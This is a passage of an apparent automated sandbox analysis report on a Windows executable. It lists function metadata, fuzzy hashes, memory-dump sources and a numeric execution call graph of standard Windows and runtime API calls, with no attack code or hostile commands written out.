                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                                                                                                                                                                                                                              Function 0041ACB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CountInfoInputLastTick
                                                                                                                                                                                                                                                                                                                              • String ID: >G
                                                                                                                                                                                                                                                                                                                              • API String ID: 3478931382-1296849874
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 569d6daaa5662565be238ffc564c13078da4f80c5dbfbbb46f8e554dd6e43052
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7D0127040020DBFCB00DFF5EC4D98D7FBCEB00359F104165A005A2111DB70E6448B14
                                                                                                                                                                                                                                                                                                                              Function 0044E0FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                                                                                                                              • String ID: @)|
                                                                                                                                                                                                                                                                                                                              • API String ID: 3253501508-2452551214
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                                                                                                                                                                                                                                                                                                              Function 02837103 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                                                                                                                              • String ID: @)|
                                                                                                                                                                                                                                                                                                                              • API String ID: 3253501508-2452551214
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 15df910850cdcb29e76c73c77be33541a226e090ca5a2204d7be0278f34cd4ad
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 285b3b6625c6ae0c5e1942194dabc0cb358d36ff0f440d737d445859e5505d5d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15df910850cdcb29e76c73c77be33541a226e090ca5a2204d7be0278f34cd4ad
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1B0087CC817009B87489F74A1685447BF0A658A523A05D9AD51683A80D7358066EA50
                                                                                                                                                                                                                                                                                                                              Function 100195D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                                                                                                                              • String ID: @)|
                                                                                                                                                                                                                                                                                                                              • API String ID: 3253501508-2452551214
                                                                                                                                                                                                                                                                                                                              • Opcode ID: edff418490ac5726873c6b354ad7297f46a89f10ea44c9e928555a22b151cab0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 14936a6ea6eaac552b727b7278c9116a94eaf87052bdbbd0fd93ebf660904ae4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: edff418490ac5726873c6b354ad7297f46a89f10ea44c9e928555a22b151cab0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92B092788013649FEB00AFF089EC86A3FA8B6A92123F02096D501C3320D6340057CF10
                                                                                                                                                                                                                                                                                                                              Function 0043FA6E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

                                                                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                                                                              Execution Coverage:6.3%
                                                                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                                                                                                                              Signature Coverage:1.3%
                                                                                                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                              Total number of Limit Nodes:74
                                                                                                                                                                                                                                                                                                                              execution_graph 37631 44dea5 37632 44deb5 FreeLibrary 37631->37632 37633 44dec3 37631->37633 37632->37633 39954 4147f3 39957 414561 39954->39957 39956 414813 39958 41456d 39957->39958 39959 41457f GetPrivateProfileIntW 39957->39959 39962 4143f1 memset _itow WritePrivateProfileStringW 39958->39962 39959->39956 39961 41457a 39961->39956 39962->39961 37634 4287c1 37635 4287d2 37634->37635 37638 429ac1 37634->37638 37639 428818 37635->37639 37640 42881f 37635->37640 37649 425711 37635->37649 37636 4259da 37697 416760 11 API calls 37636->37697 37668 425ad6 37638->37668 37704 415c56 11 API calls 37638->37704 37671 42013a 37639->37671 37699 420244 97 API calls 37640->37699 37642 4260dd 37698 424251 120 API calls 37642->37698 37645 4259c2 37645->37668 37691 415c56 11 API calls 37645->37691 37649->37636 37649->37638 37649->37645 37652 429a4d 37649->37652 37655 422aeb memset memcpy memcpy 37649->37655 37659 4260a1 37649->37659 37667 425a38 37649->37667 37687 4227f0 memset memcpy 37649->37687 37688 422b84 15 API calls 37649->37688 37689 422b5d memset memcpy memcpy 37649->37689 37690 422640 13 API calls 37649->37690 37692 4241fc 11 API calls 37649->37692 37693 42413a 90 API calls 37649->37693 37653 429a66 37652->37653 37654 429a9b 37652->37654 37700 415c56 11 API calls 37653->37700 37658 429a96 37654->37658 37702 416760 11 API calls 37654->37702 37655->37649 37703 424251 120 API calls 37658->37703 37696 415c56 11 API calls 37659->37696 37661 429a7a 37701 416760 11 API calls 37661->37701 37667->37645 37694 422640 13 API calls 37667->37694 37695 4226e0 12 API calls 37667->37695 37672 42014c 37671->37672 37675 420151 37671->37675 37714 41e466 97 API calls 37672->37714 37674 420162 37674->37649 37675->37674 37676 4201b3 37675->37676 37677 420229 37675->37677 37678 4201b8 37676->37678 37679 4201dc 37676->37679 37677->37674 37680 41fd5e 86 API calls 37677->37680 37705 41fbdb 37678->37705 37679->37674 37683 4201ff 37679->37683 37711 41fc4c 37679->37711 37680->37674 37683->37674 37686 42013a 97 API calls 37683->37686 37686->37674 37687->37649 37688->37649 37689->37649 37690->37649 37691->37636 37692->37649 37693->37649 37694->37667 37695->37667 37696->37636 37697->37642 37698->37668 37699->37649 37700->37661 37701->37658 37702->37658 37703->37638 37704->37636 37706 41fbf1 37705->37706 37707 41fbf8 37705->37707 37710 41fc39 37706->37710 37729 4446ce 11 API calls 37706->37729 37719 41ee26 37707->37719 37710->37674 37715 41fd5e 37710->37715 37712 41ee6b 86 API calls 37711->37712 37713 41fc5d 37712->37713 37713->37679 37714->37675 37718 41fd65 37715->37718 37716 41fdab 37716->37674 37717 41fbdb 86 API calls 37717->37718 37718->37716 37718->37717 37720 41ee41 37719->37720 37721 41ee32 37719->37721 37730 41edad 37720->37730 37733 4446ce 11 API calls 37721->37733 37724 41ee3c 37724->37706 37727 41ee58 37727->37724 37735 41ee6b 37727->37735 37729->37710 37739 41be52 37730->37739 37733->37724 37734 41eb85 11 API calls 37734->37727 37736 41ee70 37735->37736 37737 41ee78 37735->37737 37795 41bf99 86 API calls 37736->37795 37737->37724 37740 41be6f 37739->37740 37741 41be5f 37739->37741 37746 41be8c 37740->37746 37760 418c63 37740->37760 37774 4446ce 11 API calls 37741->37774 37743 41be69 37743->37724 37743->37734 37746->37743 37747 41bf3a 37746->37747 37749 41bed1 37746->37749 37751 41bee7 37746->37751 37777 4446ce 11 API calls 37747->37777 37750 41bef0 37749->37750 37753 41bee2 37749->37753 37750->37751 37752 41bf01 37750->37752 37751->37743 37778 41a453 86 API calls 37751->37778 37754 41bf24 memset 37752->37754 37756 41bf14 37752->37756 37775 418a6d memset memcpy memset 37752->37775 37764 41ac13 37753->37764 37754->37743 37776 41a223 memset memcpy memset 37756->37776 37759 41bf20 37759->37754 37762 418c72 37760->37762 37761 418c94 37761->37746 37762->37761 37763 418d51 memset memset 37762->37763 37763->37761 37765 41ac3f memset 37764->37765 37766 41ac52 37764->37766 37771 41acd9 37765->37771 37768 41ac6a 37766->37768 37779 41dc14 19 API calls 37766->37779 37769 41aca1 37768->37769 37780 41519d 37768->37780 37769->37771 37772 41acc0 memset 37769->37772 37773 41accd memcpy 37769->37773 37771->37751 37772->37771 37773->37771 37774->37743 37775->37756 37776->37759 37777->37751 37779->37768 37783 4175ed 37780->37783 37791 417570 SetFilePointer 37783->37791 37786 41760a ReadFile 37787 417637 37786->37787 37788 417627 GetLastError 37786->37788 37789 4151b3 37787->37789 37790 41763e memset 37787->37790 37788->37789 37789->37769 37790->37789 37792 41759c GetLastError 37791->37792 37794 4175b2 37791->37794 37793 4175a8 GetLastError 37792->37793 37792->37794 37793->37794 37794->37786 37794->37789 37795->37737 39963 44def7 39964 44df07 39963->39964 39965 44df00 ??3@YAXPAX 39963->39965 39966 44df17 39964->39966 39967 44df10 ??3@YAXPAX 39964->39967 39965->39964 39968 44df27 39966->39968 39969 44df20 ??3@YAXPAX 39966->39969 39967->39966 39970 44df37 39968->39970 39971 44df30 ??3@YAXPAX 39968->39971 39969->39968 39971->39970 37796 417bc5 37797 417c61 37796->37797 37798 417bda 37796->37798 37798->37797 37799 417bf6 UnmapViewOfFile CloseHandle 37798->37799 37801 417c2c 37798->37801 37803 4175b7 37798->37803 37799->37798 37799->37799 37801->37798 37808 41851e 20 API calls 37801->37808 37804 4175d6 CloseHandle 37803->37804 37805 4175c8 37804->37805 37806 4175df 37804->37806 37805->37806 37807 4175ce Sleep 37805->37807 37806->37798 37807->37804 37808->37801 37809 4152c7 malloc 37810 4152ef 37809->37810 37812 4152e2 37809->37812 37813 416760 11 API calls 37810->37813 37813->37812 39972 4148b6 FindResourceW 39973 4148cf SizeofResource 39972->39973 39976 4148f9 39972->39976 39974 4148e0 LoadResource 39973->39974 39973->39976 39975 4148ee LockResource 39974->39975 39974->39976 39975->39976 37814 415308 free 39977 441b3f 39987 43a9f6 39977->39987 39979 441b61 40160 4386af memset 39979->40160 39981 44189a 39982 442bd4 39981->39982 39983 4418e2 39981->39983 39984 4418ea 39982->39984 40162 441409 memset 39982->40162 39983->39984 40161 4414a9 12 API calls 39983->40161 39988 43aa20 39987->39988 39989 43aadf 39987->39989 39988->39989 39990 43aa34 memset 39988->39990 39989->39979 39991 43aa56 39990->39991 39992 43aa4d 39990->39992 40163 43a6e7 39991->40163 40171 42c02e memset 39992->40171 39997 43aad3 40173 4169a7 11 API calls 39997->40173 39998 43aaae 39998->39989 39998->39997 40013 43aae5 39998->40013 40000 43ac18 40002 43ac47 40000->40002 40175 42bbd5 memcpy memcpy memcpy memset memcpy 40000->40175 40003 43aca8 40002->40003 40176 438eed 16 API calls 40002->40176 40007 43acd5 40003->40007 40178 4233ae 11 API calls 40003->40178 40006 43ac87 40177 4233c5 16 API calls 40006->40177 40179 423426 11 API calls 40007->40179 40011 43ace1 40180 439811 163 API calls 40011->40180 40012 43a9f6 161 API calls 40012->40013 40013->39989 40013->40000 40013->40012 40174 439bbb 22 API calls 40013->40174 40015 43acfd 40021 43ad2c 40015->40021 40181 438eed 16 API calls 40015->40181 40017 43ad19 40182 4233c5 16 API calls 40017->40182 40019 43ad58 40183 44081d 163 API calls 40019->40183 40021->40019 40023 43add9 40021->40023 40023->40023 40187 423426 11 API calls 40023->40187 40024 43ae3a memset 40025 43ae73 40024->40025 40188 42e1c0 147 API calls 40025->40188 40026 43adab 40185 438c4e 163 API calls 40026->40185 40028 43ad6c 40028->39989 40028->40026 40184 42370b memset memcpy memset 40028->40184 40030 43ae96 40189 42e1c0 147 API calls 40030->40189 40032 43adcc 40186 440f84 12 API calls 40032->40186 40035 43aea8 40036 43aec1 40035->40036 40190 42e199 147 API calls 40035->40190 40038 43af00 40036->40038 40191 42e1c0 147 API calls 40036->40191 40038->39989 40041 43af1a 40038->40041 40042 43b3d9 40038->40042 40192 438eed 16 API calls 40041->40192 40047 43b3f6 40042->40047 40054 43b4c8 40042->40054 40044 43b60f 40044->39989 40251 4393a5 17 API calls 40044->40251 40045 43af2f 40193 4233c5 16 API calls 40045->40193 40233 432878 12 API calls 40047->40233 40049 43af51 40194 423426 11 API calls 40049->40194 40052 43af7d 40195 423426 11 API calls 40052->40195 40053 43b4f2 40240 43a76c 21 API calls 40053->40240 40054->40053 40239 42bbd5 memcpy memcpy memcpy memset memcpy 40054->40239 40058 43b529 40241 44081d 163 API calls 40058->40241 40059 43b428 40087 43b462 40059->40087 40234 432b60 16 API calls 40059->40234 40060 43af94 40196 423330 11 API calls 40060->40196 40064 43b47e 40067 43b497 40064->40067 40236 42374a memcpy memset memcpy memcpy memcpy 40064->40236 40065 43b544 40075 43b55c 40065->40075 40242 42c02e memset 40065->40242 40066 43afca 40197 423330 11 API calls 40066->40197 40237 4233ae 11 API calls 40067->40237 40072 43afdb 40198 4233ae 11 API calls 40072->40198 40074 43b4b1 40238 423399 11 API calls 40074->40238 40243 43a87a 163 API calls 40075->40243 40077 43b56c 40080 43b58a 40077->40080 40244 423330 11 API calls 40077->40244 40079 43afee 40199 44081d 163 API calls 40079->40199 40245 440f84 12 API calls 40080->40245 40082 43b4c1 40247 42db80 163 API calls 40082->40247 40086 43b592 40246 43a82f 16 API calls 40086->40246 40235 423330 11 API calls 40087->40235 40090 43b5b4 40248 438c4e 163 API calls 40090->40248 40092 43b5cf 40249 42c02e memset 40092->40249 40094 43b005 40094->39989 40099 43b01f 40094->40099 40200 42d836 163 API calls 40094->40200 40095 43b1ef 40210 4233c5 16 API calls 40095->40210 40097 43b212 40211 423330 11 API calls 40097->40211 40099->40095 40208 423330 11 API calls 40099->40208 40209 42d71d 163 API calls 40099->40209 40101 43add4 40101->40044 40250 438f86 16 API calls 40101->40250 40104 43b087 40201 4233ae 11 API calls 40104->40201 40105 43b22a 40212 42ccb5 11 API calls 40105->40212 40108 43b10f 40204 423330 11 API calls 40108->40204 40109 43b23f 40213 4233ae 11 API calls 40109->40213 40111 43b257 40214 4233ae 11 API calls 40111->40214 40115 43b129 40205 4233ae 11 API calls 40115->40205 40116 43b26e 40215 4233ae 11 API calls 40116->40215 40118 43b09a 40118->40108 40202 42cc15 19 API calls 40118->40202 40203 4233ae 11 API calls 40118->40203 40120 43b282 40216 43a87a 163 API calls 40120->40216 40122 43b13c 40206 440f84 12 API calls 40122->40206 40124 43b29d 40217 423330 11 API calls 40124->40217 40127 43b15f 40207 4233ae 11 API calls 40127->40207 40128 43b2af 40130 43b2b8 40128->40130 40131 43b2ce 40128->40131 40218 4233ae 11 API calls 40130->40218 40219 440f84 12 API calls 40131->40219 40134 43b2c9 40221 4233ae 11 API calls 40134->40221 40135 43b2da 40220 42370b memset memcpy memset 40135->40220 40138 43b2f9 40222 423330 11 API calls 40138->40222 40140 43b30b 40223 423330 11 API calls 40140->40223 40142 43b325 40224 423399 11 API calls 40142->40224 40144 43b332 40225 4233ae 11 API calls 40144->40225 40146 43b354 40226 423399 11 API calls 40146->40226 40148 43b364 40227 43a82f 16 API calls 40148->40227 40150 43b370 40228 42db80 163 API calls 40150->40228 40152 43b380 40229 438c4e 163 API calls 40152->40229 40154 43b39e 40230 423399 11 API calls 40154->40230 40156 43b3ae 40231 43a76c 21 API calls 40156->40231 40158 43b3c3 40232 423399 11 API calls 40158->40232 40160->39981 40161->39984 40162->39982 40164 43a6f5 40163->40164 40170 43a765 40163->40170 40164->40170 40252 42a115 40164->40252 40168 43a73d 40169 42a115 147 API calls 40168->40169 40168->40170 40169->40170 40170->39989 40172 4397fd memset 40170->40172 40171->39991 40172->39998 40173->39989 40174->40013 40175->40002 40176->40006 40177->40003 40178->40007 40179->40011 40180->40015 40181->40017 40182->40021 40183->40028 40184->40026 40185->40032 40186->40101 40187->40024 40188->40030 40189->40035 40190->40036 40191->40036 40192->40045 40193->40049 40194->40052 40195->40060 40196->40066 40197->40072 40198->40079 40199->40094 40200->40104 40201->40118 40202->40118 40203->40118 40204->40115 40205->40122 40206->40127 40207->40099 40208->40099 40209->40099 40210->40097 40211->40105 40212->40109 40213->40111 40214->40116 40215->40120 40216->40124 40217->40128 40218->40134 40219->40135 40220->40134 40221->40138 40222->40140 40223->40142 40224->40144 40225->40146 40226->40148 40227->40150 40228->40152 40229->40154 40230->40156 40231->40158 40232->40101 40233->40059 40234->40087 40235->40064 40236->40067 40237->40074 40238->40082 40239->40053 40240->40058 40241->40065 40242->40075 40243->40077 40244->40080 40245->40086 40246->40082 40247->40090 40248->40092 40249->40101 40250->40044 40251->39989 40253 42a175 40252->40253 40255 42a122 40252->40255 40253->40170 40258 42b13b 147 API calls 40253->40258 40255->40253 40256 42a115 147 API calls 40255->40256 40259 43a174 40255->40259 40283 42a0a8 147 API calls 40255->40283 40256->40255 40258->40168 40273 43a196 40259->40273 40274 43a19e 40259->40274 40260 43a306 40260->40273 40299 4388c4 14 API calls 40260->40299 40263 42a115 147 API calls 40263->40274 40264 415a91 memset 40264->40274 40265 43a642 40265->40273 40303 4169a7 11 API calls 40265->40303 40269 43a635 40302 42c02e memset 40269->40302 40273->40255 40274->40260 40274->40263 40274->40264 40274->40273 40284 42ff8c 40274->40284 40292 4165ff 40274->40292 40295 439504 13 API calls 40274->40295 40296 4312d0 147 API calls 40274->40296 40297 42be4c memcpy memcpy memcpy memset memcpy 40274->40297 40298 43a121 11 API calls 40274->40298 40276 4169a7 11 API calls 40277 43a325 40276->40277 40277->40265 40277->40269 40277->40273 40277->40276 40278 42b5b5 memset memcpy 40277->40278 40279 42bf4c 14 API calls 40277->40279 40282 4165ff 11 API calls 40277->40282 40300 42b63e 14 API calls 40277->40300 40301 42bfcf memcpy 40277->40301 40278->40277 40279->40277 40282->40277 40283->40255 40304 43817e 40284->40304 40286 42ff99 40287 42ffe3 40286->40287 40288 42ffd0 40286->40288 40291 42ff9d 40286->40291 40309 4169a7 11 API calls 40287->40309 40308 4169a7 11 API calls 40288->40308 40291->40274 40293 4165a0 11 API calls 40292->40293 40294 41660d 40293->40294 40294->40274 40295->40274 40296->40274 40297->40274 40298->40274 40299->40277 40300->40277 40301->40277 40302->40265 40303->40273 40305 438187 40304->40305 40307 438192 40304->40307 40310 4380f6 40305->40310 40307->40286 40308->40291 40309->40291 40312 43811f 40310->40312 40311 438164 40311->40307 40312->40311 40314 4300e8 3 API calls 40312->40314 40315 437e5e 40312->40315 40314->40312 40338 437d3c 40315->40338 40317 437eb3 40317->40312 40318 437ea9 40318->40317 40324 437f22 40318->40324 40353 41f432 40318->40353 40321 437f06 40400 415c56 11 API calls 40321->40400 40323 437f95 40401 415c56 11 API calls 40323->40401 40325 437f7f 40324->40325 40326 432d4e 3 API calls 40324->40326 40325->40323 40328 43802b 40325->40328 40326->40325 40329 4165ff 11 API calls 40328->40329 40330 438054 40329->40330 40364 437371 40330->40364 40333 43806b 40334 438094 40333->40334 40402 42f50e 138 API calls 40333->40402 40336 437fa3 40334->40336 40337 4300e8 3 API calls 40334->40337 40336->40317 40403 41f638 104 API calls 40336->40403 40337->40336 40339 437d69 40338->40339 40342 437d80 40338->40342 40404 437ccb 11 API calls 40339->40404 40341 437d76 40341->40318 40342->40341 40343 437da3 40342->40343 40344 437d90 40342->40344 40346 438460 134 API calls 40343->40346 40344->40341 40408 437ccb 11 API calls 40344->40408 40349 437dcb 40346->40349 40348 437de8 40407 424f26 123 API calls 40348->40407 40349->40348 40405 444283 13 API calls 40349->40405 40351 437dfc 40406 437ccb 11 API calls 40351->40406 40354 41f54d 40353->40354 40360 41f44f 40353->40360 40355 41f466 40354->40355 40438 41c635 memset memset 40354->40438 40355->40321 40355->40324 40360->40355 40362 41f50b 40360->40362 40409 41f1a5 40360->40409 40434 41c06f memcmp 40360->40434 40435 41f3b1 90 API calls 40360->40435 40436 41f398 86 API calls 40360->40436 40362->40354 40362->40355 40437 41c295 86 API calls 40362->40437 40365 41703f 11 API calls 40364->40365 40366 437399 40365->40366 40367 43739d 40366->40367 40370 4373ac 40366->40370 40439 4446ea 11 API calls 40367->40439 40369 4373a7 40369->40333 40371 416935 16 API calls 40370->40371 40372 4373ca 40371->40372 40374 438460 134 API calls 40372->40374 40378 4251c4 137 API calls 40372->40378 40382 415a91 memset 40372->40382 40385 43758f 40372->40385 40397 437584 40372->40397 40399 437d3c 135 API calls 40372->40399 40440 425433 13 API calls 40372->40440 40441 425413 17 API calls 40372->40441 40442 42533e 16 API calls 40372->40442 40443 42538f 16 API calls 40372->40443 40444 42453e 123 API calls 40372->40444 40373 4375bc 40376 415c7d 16 API calls 40373->40376 40374->40372 40377 4375d2 40376->40377 40377->40369 40379 4442e6 11 API calls 40377->40379 40378->40372 40380 4375e2 40379->40380 40380->40369 40447 444283 13 API calls 40380->40447 40382->40372 40445 42453e 123 API calls 40385->40445 40386 4375f4 40391 437620 40386->40391 40392 43760b 40386->40392 40390 43759f 40393 416935 16 API calls 40390->40393 40395 416935 16 API calls 40391->40395 40448 444283 13 API calls 40392->40448 40393->40397 40395->40369 40397->40373 40446 42453e 123 API calls 40397->40446 40398 437612 memcpy 40398->40369 40399->40372 40400->40317 40401->40336 40402->40334 40403->40317 40404->40341 40405->40351 40406->40348 40407->40341 40408->40341 40410 41bc3b 101 API calls 40409->40410 40411 41f1b4 40410->40411 40412 41edad 86 API calls 40411->40412 40419 41f282 40411->40419 40413 41f1cb 40412->40413 40414 41f1f5 memcmp 40413->40414 40415 41f20e 40413->40415 40413->40419 40414->40415 40416 41f21b memcmp 40415->40416 40415->40419 40417 41f326 40416->40417 40420 41f23d 